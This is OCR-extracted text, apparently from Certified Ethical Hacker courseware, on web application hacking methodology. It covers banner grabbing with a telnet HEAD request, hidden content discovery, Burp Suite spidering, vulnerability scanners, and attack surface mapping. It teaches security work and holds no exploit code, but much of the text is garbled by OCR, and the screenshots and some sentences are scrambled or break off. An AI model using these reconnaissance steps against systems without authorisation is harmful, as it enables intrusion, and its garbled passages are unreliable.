S e rvice d is c o v e r y f in d s t h e se rvice s r u n n i n g o n w e b s e rv e rs t h a t can be e x p l o i t e d as

a t t a c k p a th s f o r w e b a p p li c a t i o n h a c k in g . S e rvice d is c o v e r y s e a rc h e s a t a r g e t e d a p p l i c a t i o n
e n v i r o n m e n t f o r lo a d s a n d se rvic e s a u t o m a t i c a ll y . T h e t a r g e t e d s e r v e r has t o be s c a n n e d
t h o r o u g h l y so t h a t c o m m o n p o r ts u sed b y w e b s e rv e rs f o r d i f f e r e n t s e rv ic e s can be i d e n t if ie d .
T h e t a b l e t h a t f o l l o w s s h o w s t h e list o f c o m m o n p o r ts u sed by w e b s e rv e rs a n d t h e r e s p e c tiv e

HTTP services:
P ort T y p ic a l HTTP S e rv ic e s
80 W o r l d W i d e W e b s ta n d a r d p o r t
81 A lte rn a te W W W
88 K e r b e ro s
443 SSL ( h tt p s )
900 IB M W e b s p h e r e a d m i n i s t r a t i o n c l i e n t
2301 C o m p a q Insight M a n a g e r

F o o tp rin t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
CEH
Urt1fw4 ilhiul lUtbM
A n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f i e l d t o i d e n t i f y t h e m a k e , m o d e l , a n d v e r s io n
o f th e w e b s e rv e r s o ftw a r e
T h is in f o r m a t io n h e lp s a t ta c k e r s t o s e le c t t h e e x p lo it s f r o m v u l n e r a b il it y d a ta b a s e s t o
a t ta c k a w e b s e r v e r a n d a p p lic a tio n s
C: \ t e l n e t www. juggyboy.com 80 HEAD / HTTP/1.0
HTTP/1.1 200 OK S e rver id e n tifie d

§ate?rihu!C
C 095Jj!”idSs5!
ontent-Lype:
frgth: 1270ml as M ic ro s o ft IIS
Content-T text/M
sJt-Cookl»T°*Cp5cis:CNID««TC0e0-PBLPKEK0N0<:K0FFIP0CHPLNEi
Via: 1.1 Application aid Content Networking Systen Sof tvware 5.1.15
Connect io n ! C lo s e
nneetIon to ho«t lost.
B a n n e r g r a b b in g t o o ls :
1. T e ln e t 2. N e tc a t 3 . ID S e rv e 4. N e tc ra ft
H
Copyright © by E&Cauicfl. All Rights Reserved. Reproduction is Strictly Prohibited.
‫׳‬ ■, F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
T h r o u g h b a n n e r g ra b b in g , an a t t a c k e r id e n t if ie s b r a n d a n d / o r v e r s io n o f a s e rv e r, an o p e r a t i n g
s y s te m , o r an a p p li c a t i o n . A t t a c k e r s a n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f ie ld t o i d e n t i f y t h e
m a k e , m o d e l , a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e . T his i n f o r m a t i o n h e lp s a tt a c k e r s t o
s e le c t t h e e x p lo it s f r o m v u l n e r a b i l i t y d a ta b a s e s t o a t t a c k a w e b s e r v e r a n d a p p lic a tio n s .
C : \ t e l n e t w w w .ju g g y b o y .c o m 80 HEAD / H T T P /1 .0
A b a n n e r can be g r a b b e d w i t h t h e h e lp o f t o o l s such as:
© T e ln e t
Q N etcat
e ID Serve
© N e tc ra ft
T h e s e t o o l s m a k e b a n n e r g r a b b i n g a n d a na lysis an easy ta sk.

F o o tp rin t W e b In fr a s tr u c tu r e : H id d e n
C o n te n t D is c o v e r y
CEH
J D is c o v e r t h e h id d e n c o n t e n t a n d f u n c t i o n a l it y t h a t is n o t r e a c h a b le f r o m t h e m a in
v is ib le c o n t e n t t o e x p l o it u s e r p r iv ile g e s w it h in t h e a p p lic a tio n
J I t a llo w s a n a tta c k e r t o r e c o v e r b a c k u p c o p ie s o f liv e file s , c o n f ig u r a tio n file s a n d lo g

file s c o n ta in in g s e n s itiv e d a ta , b a c k u p a rc h iv e s c o n ta in in g s n a p s h o ts o f file s w ith in
t h e w e b r o o t , n e w f u n c tio n a lit y w h ic h is n o t lin k e d t o t h e m a in a p p lic a tio n , e tc .
Attacker-Directed
Spidering
© W e b sp id e rs a u to m a tic a lly A tta c k e r accesses all o f th e e Use a u to m a tio n t o o ls such

d is c o v e r t h e h id d e n ap p lic a tio n 's fu n c tio n a lity as B u rp s u ite t o m ake
c o n t e n t a nd f u n c tio n a lity and uses an in te rc e p tin g huge n u m b e rs o f re q u e s ts
by p arsin g H T M L fo r m and proxy to m o n ito r all requests t o th e w e b s e rv e r in o r d e r
c lie n t-s id e JavaS cript and responses t o guess th e n a m es o r
re q u e s ts a n d response s The in te rc e p tin g proxy parses id e n tifie rs o f h idden
all o f th e a p p lica tion's c o n te n t a n d f u n c tio n a lity
© W e b S p id e rin g T ools:
responses and re p o rts th e
S O W ASP Z ed A tta c k P ro x y c o n te n t and fu n c tio n a lity it
discovers
S B u rp S p id e r
T o o l: O W ASP Zed A tta c k
- W e b S c a ra b
P ro x y
F o o tp r in t W e b In fr a s tr u c tu r e : H id d e n C o n te n t
D is c o v e r y
C ru cia l i n f o r m a t i o n r e la t e d t o t h e b u s in e s s such as p rice s o f p r o d u c ts , d is c o u n ts , lo g in IDs, and

p a s s w o r d s is k e p t s e c re t. This i n f o r m a t i o n is u s u a lly n o t v is ib le t o o u ts id e r s . T his i n f o r m a t i o n is
u s u a lly s t o r e d in h id d e n f o r m fie ld s . D is c o v e r t h e h id d e n c o n t e n t a n d f u n c t i o n a l i t y t h a t is n o t
r e a c h a b le f r o m t h e m a in v is ib le c o n t e n t t o e x p l o i t u s e r p r i v i le g e s w i t h i n t h e a p p li c a t i o n . This
a llo w s an a t t a c k e r t o r e c o v e r b a c k u p c o p ie s o f live file s, c o n f i g u r a t i o n file s, a n d log file s
c o n t a i n i n g s e n s itiv e d a ta , b a c k u p a rc h iv e s c o n t a i n i n g s n a p s h o t s o f file s w i t h i n t h e w e b r o o t ,
n e w f u n c t i o n a l i t y t h a t is n o t lin k e d t o t h e m a in a p p li c a t i o n , e tc. T h e se h id d e n fie ld s can be
d e t e r m i n e d w i t h t h e h e lp o f t h r e e te c h n i q u e s . T h e y are:
W e b S p id e rin g
W e b s p id e r s a u t o m a t i c a l l y d is c o v e r h id d e n c o n t e n t a n d f u n c t i o n a l i t y b y p a rs in g H T M L
f o r m s a n d c l i e n t- s id e Ja v a S c rip t r e q u e s ts a n d re sp o n s e s .
T o o ls t h a t can be u sed t o d is c o v e r t h e h id d e n c o n t e n t b y m e a n s o f w e b s p id e r i n g in c lu d e :
Q O W A S P Zed A t t a c k P ro xy
Q B u r p S p id e r
© W ebS cara b

W e b S p id e r in g U s in g B u r p S u ite C E H
C«rt1fW
4 itfciul NmIm
C o n fig u re y o u r w e b b r o w s e r t o use B u rp as a lo c a l p ro x y C h e c k t h e s ite m a p g e n e ra te d by th e B u rp

A cce ss t h e e n tir e t a r g e t a p p lic a tio n v is itin g e v e ry single p roxy, a n d id e n t if y a n y h id d e n a p p lic a tio n
lin k /U R L p ossible , and s u b m it a ll th e a p p lic a tio n fo rm s c o n te n t o r fu n c tio n s
a v a ila b le C o n tin u e th e s e s teps re c u rs iv e ly u n til no
B ro w s e t h e ta r g e t a p p lic a tio n w ith Ja va S crip t e n a b le d and f u r t h e r c o n t e n t o r f u n c tio n a lit y is
d is a b le d , a n d w ith c o o k ie s e n a b le d a n d d is a b le d id e n tifie d
burp suite free edition v1.4.01 intruder attack 1
— ‫׳‬uaeT repeater | sequencer ' aecoaer comparer | options | alpris
resurs ttrset j po3mons payioaqs | options

comment
[ p93!tons payloads ' options |
!reouesr
weosovce*woe* ?00 ‫ כ‬10443.

2 payweq poamona len din 46*. loauflit rssponso |
OCT / t b ? l d H ^ W 'r ' nw r.-nm‫ ־‬rrnfleri hf<
H>9t: t3 1 .w w .b ln g .n e t
P ro x y -c c n n c c c io tu ic e c p -« 1 m OTT / t h 7 1 d - l . 4M 7«C 150040::3 U [1 id ‫ ־‬l ,
MvO.. kl1.iM.LliUJ.UVl
I H T T P /I. I
U w - A « j- n t: M o x tllA /S .a (Utnclowx NT t . 2; IfOWM)
P xo x y -C o n n tc tio n : kwp-««l.Lve
Ic’cvpt: »/ *
1
AppleVebK1c/S39.^ iKITOJL, Like Cecko)
-h ro n e , ‫ ב ג‬. u . 1 :: 9 .3 a S a ta r /6 3 7 .4
1 lM t‫ ־‬lg * n e : K o x ilW S .O (Window■* NT C. 2 ; V0V£«) A p p l« 0 » b X lt/3 3 7 . «
{KBTHL, like Oeeko) Chrowe/22.0. i229.9‫־‬l Srttor 1 /S 3 7 . 1
R»Z«x«x: Accept: ‫י‬/•
6
6 SCICD3 ASD2 EABE0 351PE0S7SD 12 S54tP ORN-1OPRBA
\c~*l
h t t p : / / * » w . b in g . c ocV anwwj-.‫י־‬/ it o c c M q-b i id-«CCC7£'70 Mttrtn
h t t p : / / v ‫׳‬rf‫־‬r f.M n g .c o » / U » *y « s/i«a 1:ch? q-blk*i11 id‫« ־‬CCC7«70<SClCPJA9P:SA,SS9<J
A c c e pt-E nco ding : g z 1 p , d e lla te , 9dcH 5ir1C575D1:594*POPH-rcrRBA
Accvpt-Zncodisvg: cjzip , d * f lu te , aclch
| 0 matches A cce pt-lan gu a{re: en-US, en: g8 .0 ‫־‬
ic ce p c-cn a trse c: JSO -88S S-l,uc£-8;«r=0.7, '; q * 0 .3
h ttp ://w w w .p o rts w ig g e r.n e t
Copyright © by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b S p id e rin g U s in g B u r p S u ite
^ ^ S o u rc e : h t t p : / / w w w . p o r t s w i R g e r . n e t
B u rp S u ite is an i n t e g r a t e d p l a t f o r m f o r a t t a c k in g w e b a p p lic a tio n s . It c o n t a in s all t h e B u rp t o o ls

w i t h n u m e r o u s in t e r f a c e s b e t w e e n t h e m , d e s ig n e d t o f a c i l i t a t e a n d s p e e d u p t h e p ro c e s s o f
a t t a c k in g an a p p lic a t io n .
B u rp S u ite a llo w s y o u t o c o m b i n e m a n u a l a n d a u t o m a t e d t e c h n i q u e s t o e n u m e r a t e , a na lyze ,

scan, a tta c k , a n d e x p l o i t w e b a p p lic a tio n s . T h e v a r io u s B u r p t o o l s w o r k t o g e t h e r e f f e c t i v e l y t o
s h a re i n f o r m a t i o n a n d a ll o w f in d in g s i d e n t if ie d w i t h i n o n e t o o l t o f o r m t h e basis o f an a t t a c k
u sin g a n o t h e r .
W e b s p id e r e in g u sin g B u rp S u ite is d o n e in t h e f o l l o w i n g m a n n e r :
1. C o n fig u r e y o u r w e b b r o w s e r t o use B u rp as a local p r o x y
2. Access t h e e n t i r e t a r g e t a p p li c a t i o n v is itin g e v e r y s ing le lin k /U R L p o s s ib le , a n d s u b m i t all

t h e a p p li c a t i o n f o r m s a v a ila b le
3. B r o w s e t h e t a r g e t a p p li c a t i o n w i t h J a v a S c r ip t e n a b le d a n d d is a b le d , a n d w i t h c o o k ie s
e n a b le d a n d d is a b le d
4. C he ck t h e s ite m a p g e n e r a t e d b y t h e B u rp p ro x y , a n d i d e n t i f y a n y h id d e n a p p li c a t i o n
c o n t e n t o r f u n c t io n s

W e b S p id e r in g U s in g M o z e n d a
W e b A g e n t B u ild e r
CEH
J M ozenda W eb A gent
B u ild e r c r a w ls t h r o u g h
a w e b s it e a n d h a rv e s ts
p a g e s o f in fo r m a tio n
Cop yrig ht © by E & C o u a cil. A ll Rights Reserved. R eproduction is S trictly Prohibited.
W e b S p id e rin g U s in g M o z e n d a W e b A g e n t B u ild e r
S o u rc e : h t t p : / / w w w . m o z e n d a . c o m
M o z e n d a W e b A g e n t B u ild e r is a W i n d o w s a p p li c a t i o n u sed t o b u ild y o u r d a ta e x t r a c t i o n

p r o je c t . It c r a w ls t h r o u g h a w e b s i t e a n d h a r v e s ts pages o f i n f o r m a t i o n . W e b A g e n t B u ild e r is a
t o o l s u it e t h a t in c lu d e s an i n t u i t i v e Ul a n d a b r o w s e r - b a s e d i n s t r u c t i o n set. S e ttin g u p y o u r
c r a w l e r is as s im p le as p o i n t i n g a n d c lic k in g t o n a v i g a t e p a g e s a nd c a p t u r e t h e i n f o r m a t i o n y o u
w an t.

Attack Attack Attack Session Attack Attack

Web Servers Authentication Management Data Connectivity Web Services
Mechanism Mechanism
W e b A p p H a c k in g M e th o d o lo g y
A tta c k W e b S e rv e rs
Once you conduct f u ll scope fo o tp rin tin g on web in fra s tru c tu re , a n a ly z e th e g a th e re d

i n f o r m a t i o n t o f i n d t h e v u l n e r a b i l it ie s t h a t can be e x p l o i t e d t o la u n c h a t t a c k s o n w e b se rve rs.
T h e n a t t e m p t t o a t t a c k w e b s e rv e rs u s in g v a r io u s t e c h n i q u e s a v a ila b le . Each a n d e v e r y w e b s i t e
o r w e b a p p li c a t i o n is a s s o c ia te d w i t h a w e b s e r v e r t h a t has c o d e f o r s e rv in g a w e b s i t e o r w e b
a p p li c a t i o n . T h e a t t a c k e r e x p l o i t s t h e v u ln e r a b i l it ie s in t h e c o d e a n d la u n c h e s t h e a tta c k s o n
t h e w e b s e rv e r. D e ta ile d i n f o r m a t i o n a b o u t h a c k in g w e b s e rv e rs w i ll be e x p la in e d o n t h e
f o l l o w i n g slides.

H a c k in g W e b s e rv e rs
—5. O n c e t h e a t t a c k e r id e n t if ie s t h e w e b s e rv e r e n v i r o n m e n t , a t ta c k e r s scan f o r k n o w n
v u ln e r a b i l it ie s by u sin g a w e b s e r v e r v u l n e r a b i l i t y s c a n n e r. V u l n e r a b i l i t y s c a n n in g h e lp s t h e
a t t a c k e r t o la u n c h t h e a t t a c k e a sily b y i d e n t i f y i n g t h e e x p l o i t a b l e v u ln e r a b i l it ie s p r e s e n t o n t h e
w e b s e rv e r. O n c e t h e a t t a c k e r g a th e r s all t h e p o t e n t i a l v u l n e r a b i l i t i e s , he o r sh e tr ie s t o e x p l o i t
t h e m w i t h t h e h e lp o f v a r io u s a t t a c k t e c h n i q u e s t o c o m p r o m i s e t h e w e b s e rv e r. In o r d e r t o s to p
t h e w e b s e rv e r f r o m s e rv in g l e g i t i m a t e users o r c lie n ts , t h e a t t a c k e r la u n c h e s a DoS a t ta c k
a g a in s t t h e w e b s e rv e r. You can la u n c h a tta c k s o n t h e v u ln e r a b l e w e b s e r v e r w i t h t h e h e lp o f
t o o l s such as U rIScan, N ik to , Nessus, A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r, W e b ln s p e c t , e tc.

W e b S e r v e r H a c k in g T o o l:
CEH
W e b ln s p e c t
J W e b ln s p e c t id e n tifie s s e c u r it y
v u l n e r a b il it ie s in t h e w e b
a p p lic a tio n s
J I t ru n s in t e r a c t iv e s c a n s u s in g
a s o p h is tic a te d u s e r in te r fa c e
J A tta c k e r c a n e x p lo it id e n tifie d t ‫■’ ■ ו‬

v u ln e r a b ilitie s t o c a r r y o u t ®**‫*י‬ "•*‫י״‬ "* ‫ג־״‬2‫•־‬
w e b s e r v ic e s a tta c k s - • wo u
h ttp s ://d o w n lo a d .h p s m a rtu p d a te .c o m
W e b s e r v e r H a c k in g T o o l: W e b ln s p e c t
S o u rc e : h t t p s : / / d o w n l o a d . h p s m a r t u p d a t e . c o m
W e b l n s p e c t s o f t w a r e is w e b a p p li c a t i o n s e c u r it y a s s e s s m e n t s o f t w a r e d e s ig n e d t o t h o r o u g h l y
a n a ly z e t o d a y 's c o m p le x web a p p lic a tio n s . It d e liv e r s fa s t s c a n n in g c a p a b i l it ie s , b ro a d
a s s e s s m e n t c o v e r a g e , a n d a c c u r a te w e b a p p li c a t i o n s c a n n in g re s u lts . It id e n t if ie s s e c u r it y
v u ln e r a b i l it ie s th a t a re u n d e te c ta b le by tra d itio n a l scanners. A tta ck e rs can e x p lo it th e
i d e n t i f i e d v u l n e r a b i l it ie s f o r l a u n c h in g w e b s e rv ice s a tta c k s .

Exam 312-50 C ertified Ethical H acker

Mechanism Mechanism
A n a ly z e W e b A p p lic a tio n s
A n a ly z in g t h e w e b a p p li c a t i o n h e lp s y o u in i d e n t i f y i n g d i f f e r e n t v u ln e r a b l e p o i n t s t h a t can be
e x p l o i t a b l e b y t h e a t t a c k e r f o r c o m p r o m i s i n g t h e w e b a p p l i c a t i o n . D e t a ile d i n f o r m a t i o n a b o u t
a n a ly z in g a w e b a p p li c a t i o n a n d i d e n t i f y i n g t h e e n t r y p o i n t s t o b re a k i n t o t h e w e b a p p li c a t i o n
w i ll be d iscu sse d o n t h e f o l l o w i n g slides.

Analyze Web Applications AEH itfciul N«h««
■ A n a ly z e t h e a c t i v e a p p l i c a t i o n ' s f u n c t i o n a l i t y a n d t e c h n o l o g i e s in o r d e r t o i d e n t i f y t h e a t t a c k
s u r fa c e s t h a t it e x p o s e s
Identify E n try P o in ts fo r Identify Server-S id e

U s e r Input Fu n ctio n a lity
O b s e rv e t h e a p p lic a tio n s
R e v ie w t h e g e n e ra te d HTTP
re v e a le d to th e c lie n t t o
re q u e s t t o id e n t if y th e
id e n t if y t h e s e rv e r-s id e
in p u t e n tr y p o in ts
s tru c tu r e a n d f u n c tio n a lit y
Identify Server-S id e Map the A tta c k

T e ch n o lo g ie s S u rface
F in g e r p r in t t h e te c h n o lo g ie s Id e n tify th e v ariou s a tta c k surfaces
a c tiv e o n t h e s e rv e r u s in g un co ve re d by th e a p p lica tions and
v a r io u s f in g e r p r in t te c h n iq u e s th e v u ln e ra b ilitie s th a t are associated
s u c h as HTTP fin g e r p r in tin g w ith each one
Copyright © by E&Ctuacil. All Rights Reserved.!Reproduction is Strictly Prohibited.
™ j A n a ly z e W e b A p p lic a tio n s
---------- W e b a p p li c a t i o n s h a ve v a r io u s v u ln e r a b i l it ie s . First, basic k n o w l e d g e r e la t e d t o t h e

w e b a p p li c a t i o n has t o be a c q u ir e d b y t h e a t t a c k e r a n d t h e n a n a ly z e t h e a c t i v e a p p l i c a t i o n 's
f u n c t i o n a l i t y a n d te c h n o l o g i e s in o r d e r t o i d e n t i f y t h e a t t a c k s u rfa c e s t h a t it e xp o se s.
I d e n t i f y E n t r y P o in ts f o r U s e r I n p u t
T h e e n t r y p o i n t o f an a p p li c a t i o n s e rve s as an e n t r y p o i n t f o r a tta c k s ; th e s e e n t r y p o in t s in c lu d e
t h e f r o n t - e n d w e b a p p li c a t i o n t h a t lis te n s f o r HTTP r e q u e s ts . R e v ie w t h e g e n e r a t e d HTTP
r e q u e s t t o i d e n t i f y t h e u s e r i n p u t e n t r y p o in ts .
I d e n t i f y S e r v e r - s id e F u n c t i o n a l i t y
S e r v e r -s id e f u n c t i o n a l i t y r e fe r s t o t h e a b i l it y o f a s e r v e r t h a t e x e c u t e s p r o g r a m s o n o u t p u t w e b
pages. T h o s e a re s c r ip ts t h a t re s id e a n d also a l l o w r u n n i n g i n t e r a c t i v e w e b p ages o r w e b s i t e s
o n p a r t i c u l a r w e b s e rve rs . O b s e r v e t h e a p p li c a t i o n s r e v e a le d t o t h e c l i e n t t o i d e n t i f y t h e s e rv e r-
side s t r u c t u r e a n d f u n c t i o n a l i t y .
I d e n t i f y S e r v e r - s id e T e c h n o l o g i e s
S e r v e r -s id e t e c h n o l o g i e s o r s e r v e r - s id e s c r ip tin g r e fe r s t o t h e d y n a m i c g e n e r a t io n o f w e b pages
t h a t a re s e rv e d by t h e w e b se rv e rs , as t h e y a re o p p o s e d t o s t a t i c w e b p a g e s t h a t a re in t h e
s to r a g e o f t h e s e r v e r a n d s e rv e d t o w e b b r o w s e r s . F i n g e r p r i n t t h e te c h n o l o g i e s a c tiv e o n t h e
s e r v e r u s in g v a r io u s f i n g e r p r i n t t e c h n i q u e s such as HTTP f i n g e r p r i n t i n g .

A n a ly z e W e b A p p lic a tio n s :
I d e n t if y E n tr y P o in ts fo r U & e r In p u t
Examine URL, HTTP Header,

query string parameters, POST
data, and cookies to Identify HTTP header parameters
determine all user input fields that can be processed by the
application as user inputs such as
User-Agent, Referer, Accept,
Accept-Language, and Host headers
Determine URL encoding

techniques and other
Tools used:
encryption measures
implemented to secure the « Burp Suite
web traffic such as SSL » HttPrint
‫ט‬ WebScarab
‫ט‬ OWASP Zed Attack Proxy
.Copyright © by E&CaiHGO. All Rights Reserved.!Reproduction is Strictly Prohibited.
A n a ly z e W e b A p p lic a tio n s : Id e n tify E n tr y P o in ts fo r
U s e r In p u t
Q D u r in g t h e w e b a p p li c a t i o n a na lysis, a t ta c k e r s i d e n t i f y e n t r y p o i n t s f o r u se r i n p u t so t h a t
t h e y can u n d e r s t a n d t h e w a y t h e w e b a p p li c a t i o n a c c e p ts o r h a n d le s t h e u s e r i n p u t .
T h e n t h e a t t a c k e r tr ie s t o f i n d t h e v u ln e r a b i l it ie s p r e s e n t in i n p u t m e c h a n i s m a n d tr ie s
to e x p lo it th e m so t h a t a t t a c k e r can a s s o c ia te w ith o r g ain access t o th e web
a p p lic a t io n . E x a m in e URL, HTTP H e a d e r , q u e r y s t r i n g p a r a m e t e r s , POST d a t a , a nd
c o o k ie s t o d e t e r m i n e all u s e r i n p u t fie ld s .
0 I d e n t i f y HTTP h e a d e r p a r a m e t e r s t h a t can be p ro c e s s e d b y t h e a p p li c a t i o n as u se r
i n p u t s such as U s e r - A g e n t, R e fe r re r, A c c e p t, A c c e p t-L a n g u a g e , a n d H o s t h e a d e rs .
0 D e t e r m i n e URL e n c o d i n g t e c h n i q u e s a n d o t h e r e n c r y p t i o n m e a s u r e s i m p l e m e n t e d t o
s e c u r e t h e w e b t r a f f i c such as SSL.
T h e t o o l s u sed t o a n a ly z e w e b a p p li c a t i o n s t o i d e n t i f y e n t r y p o in t s f o r u s e r i n p u t i n c lu d e B u r p
S u ite , H t t P r i n t , W e b S c a r a b , O W A S P Zed A t t a c k P r o x y , e tc.

A n a ly z e W e b A p p lic a tio n s : Id e n tify
S e r v e r - S id e T e c h n o lo g ie s
Perform a detailed s e r v e r E x a m in e URLs for file Examine the E x a m in e s e s s io n t o k e n s :

f in g e r p r in t i n g , analyze extensions, directories, e r r o r p a g e messages
a JSESSIONID - Java
HTTP headers and HTML and other identification
source code to identify « ASPSESSIO NID-IIS
information
s e rv e r
server side technologies
« ASP.NET_Sessionld ‫־‬
ASP.NET
» PHPSESSID - PHP
U iw http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0 Microxaft-IISJfl 0
O ops!
Apache;2 0.32 !Fedora)
Server Error in ,/ReportServer' Application.
Couldnotfindthepermissionsetnamed'ASP.Net'.
SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1
Description:Anunhandedexceptionoccurredduringthe
executionofthecurrentwebrequest. Pleasereviewthestack
\ 1 traceformoreinformationabouttheerrorandwhereit
Micro* oft-IIS'6.0.0 originatedinthecode.
VersionInformation: Microsoft .Net FrameworkVersion
4.0.30319;ASP.NetVersion4.0.30319.1
'> Server Side Technologies < •
A n a ly z e W e b A p p lic a tio n s : Id e n tify S e r v e r -S id e
T e c h n o lo g ie s
S o u rc e : h t t p : / / n e t - s q u a r e . c o m
A f t e r i d e n t i f y i n g t h e e n t r y p o i n t s t h r o u g h u s e r in p u t s , a t ta c k e r s t r y t o i d e n t i f y s e r v e r - s i d e
te c h n o lo g ie s .
T h e s e rv e r- s id e t e c h n o l o g i e s can be i d e n t i f i e d as f o l lo w s :
1. P e r f o r m a d e t a i le d s e r v e r f i n g e r p r i n t i n g , a n a ly z e HTTP h e a d e rs a nd H T M L s o u r c e c o d e
t o i d e n t i f y s e rv e r side te c h n o l o g i e s
E x a m in e URLs f o r file e x te n s io n s , d ir e c t o r i e s , a n d o t h e r i d e n t i f i c a t i o n i n f o r m a t i o n
E x a m in e t h e e r r o r p age m essa ge s
E x a m in e session t o k e n s :
e JSESSION ID - Java
© ASPSESSION I D - I I S s e r v e r
e A S P .N E T _ S e s s io n lD -A S P .N E T
e PHPSESS I D - P H P

A n a ly z e W e b A p p lic a tio n s : I d e n t if y s* c i ■
S e r v e r - S id e F u n c tio n a lity Hi —5!
Examine pagesource and URLs and make an educated guess to determ ine the
internal structure and functionality of web applications
GNU Wget http://www. gnu.org

T o o ls ^ >> http://www. tenmax. com
Teleport Pro
© used:
h ttp://softb ytelab s.com
&
BlackWidow
E x a m in e U R L
SSL ASPX Platform

A A
h t t p s : / /w w w .ju g g y b o y . c o m /c u s to m e r s . a sp x ? n a m e = e x is tin g % 2 0 c l i e n t s & i s A c t i v e =

O S sta rtD a te= 2 0 % 2 F ll% 2 F 2 0 1 0 S e n d D a te = 2 0 % 2 F 0 5 % 2 F 2 0 1 l& sh o w B y = n am e
A n a ly z e W e b A p p lic a tio n s : Id e n tify S e r v e r -s id e
F u n c tio n a lity
O n c e t h e s e rv e r- s id e te c h n o l o g i e s a re d e t e r m i n e d , i d e n t i f y t h e s e r v e r - s id e f u n c t i o n a l i t y . This
h e lp s y o u t o f i n d t h e p o t e n t i a l v u l n e r a b i l it ie s in s e r v e r - s id e f u n c t io n a l it ie s . E x a m in e p age
source and URLs a n d make an e d u c a t e d guess t o d e te rm in e th e in te rn a l s tru c tu re a nd
f u n c t i o n a l i t y o f w e b a p p li c a t i o n s .
T o o ls U s e d :
0 % W g e t
—— Sour c e: h t t p : / / w w w . g n u . o r g
G N U W g e t is f o r r e t r i e v i n g file s u s in g HTTP, HTTPS, a n d FTP, t h e m o s t w i d e ly - u s e d I n t e r n e t

p r o t o c o ls . It is a n o n - i n t e r a c t i v e c o m m a n d - l i n e t o o l , so it can be ca lle d f r o m s c rip ts , cron jo b s ,
t e r m i n a l s w i t h o u t X - W i n d o w s s u p p o r t , e tc.
T e le p o rt P ro
S o u rc e : h t t p : / / w w w . t e n m a x . c o m
T e l e p o r t Pro is an a ll - p u r p o s e h ig h - s p e e d t o o l f o r g e t t i n g d a ta f r o m t h e I n t e r n e t . L au nch u p t o
t e n s i m u l t a n e o u s r e t r ie v a l th r e a d s , access p a s s w o r d - p r o t e c t e d sites, f i l t e r file s b y size a nd

A n a ly z e W e b A p p l i c a t i o n s : M a p
CEH
t h e A t t a c k S u r f a c e Urt1fw4 ilh iu l lUtbM
------------------------------------------- ------------------------------------------------ -------------------------------------------- -

In fo r m a tio n A tta c k In fo r m a tio n A tta c k
|----------------------------------------------- -------------------------------------------- - ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■
₪ ₪ ₪ ₪ ₪ ₪ m ₪ m
In je c tio n A tta c k , P riv ile g e E s c a la tio n ,

C lie n t-S id e V a lid a tio n In je c tio n A tta c k
A u th e n tic a tio n A tta c k Access C o n tro ls
SQL In je c tio n , D a ta C le a rte x t D a ta T h e ft, Session

D a ta b a s e In te r a c tio n
Lea kage C o m m u n ic a tio n H ija c k in g
File U p lo a d a n d
D ire c to ry T ra v e rs a l E rro r M es s a g e I n fo r m a tio n L e a kage
D o w n lo a d
D is p la y o f
C ro s s -S ite S c rip tin g E m a il In te r a c tio n E m a il In je c tio n
U s e r-S u p p lie d D a ta
R e d ire c tio n , H e a d e r
D y n a m ic R e d ire c ts A p p lic a tio n C o des B u ffe r O v e rflo w s
In je c tio n
U s e rn a m e E n u m e ra tio n , T h ird -P a rty K n o w n V u ln e ra b ilitie s

Log in
P a s s w o rd B ru te -F o rc e A p p lic a tio n E x p lo ita tio n
S ession H ija c k in g , K n o w n V u ln e ra b ilitie s

S ession S ta te W e b S e rv e r S o ftw a re
Session F ix a tio n E x p lo ita tio n
A n a ly z e W e b A p p lic a tio n s : M a p th e A tta c k S u rfa c e
T h e r e a re v a r io u s e n t r y p o i n t s f o r a tt a c k e r s t o c o m p r o m i s e t h e n e t w o r k , so p r o p e r
a na lys is o f t h e a t t a c k s u rfa c e m u s t be d o n e . T h e m a p p i n g o f t h e a t t a c k s u rfa c e in c lu d e s
t h o r o u g h c h e c k in g o f p o s s ib le v u l n e r a b i l i t i e s t o la u n c h t h e a tta c k . T h e f o l l o w i n g a re t h e
v a r io u s f a c t o r s t h r o u g h w h i c h an a t t a c k e r c o lle c ts t h e i n f o r m a t i o n a n d p la n s t h e k in d o f a t ta c k
t o b e la u n c h e d .


Mechanism Mechanism
Cop yrig ht © by EC-Cauactl. A ll Rights Reserved. R eproduction is S trictly Prohibited.
In w e b a p p lic a tio n s , t h e a u t h e n t i c a t i o n f u n c t i o n a l i t y has m a n y d e sig n l o o p h o l e s such

as b ad p a s s w o r d s , i.e. s h o r t o r b la n k , c o m m o n d i c t i o n a r y w o r d s o r n a m e s , p a s s w o r d s se t t h e
same as u s e r n a m e , and th o se still se t t o d e f a u l t v a lu e s . T h e a t t a c k e r can e x p lo it th e
v u l n e r a b i l i t i e s in t h e a u t h e n t i c a t i o n m e c h a n i s m f o r g a in in g access t o t h e w e b a p p li c a t i o n o r
n e t w o r k . T h e v a r io u s t h r e a t s t h a t e x p l o i t t h e w e a k n e s s e s in t h e a u t h e n t i c a t i o n m e c h a n is m
in c lu d e n e t w o r k e a v e s d r o p p i n g , b r u t e f o r c e a tta c k s , d i c t i o n a r y a tta c k s , c o o k ie r e p la y a tta c k s ,
c r e d e n t i a l t h e f t , e tc.

__
A t t a c k A u t h e n t i c a t io n
CEH
M e c h a n i s m
A tta c k A u th e n tic a tio n M e c h a n is m
U ‫^־‬ M o s t o f t h e a u t h e n t i c a t i o n m e c h a n is m s used by w e b a p p li c a t i o n s h a ve d e s ig n fla w s . If

an a t t a c k e r can i d e n t i f y th o s e d e s ig n fla w s , he o r she can e a sily e x p l o i t t h e f l a w s a n d g ain
u n a u t h o r i z e d access. T h e d e s ig n f l a w s in c lu d e f a ilin g t o c h e c k p a s s w o r d s t r e n g t h , in s e c u r e
t r a n s p o r t a t i o n o f c r e d e n t ia ls o v e r t h e I n t e r n e t , e tc. W e b a p p li c a t i o n s u s u a lly a u t h e n t i c a t e t h e i r
c lie n ts o r u sers b ase d o n a c o m b i n a t i o n o f u s e r n a m e a nd p a s s w o r d . H e n ce , t h e a u t h e n t i c a t i o n
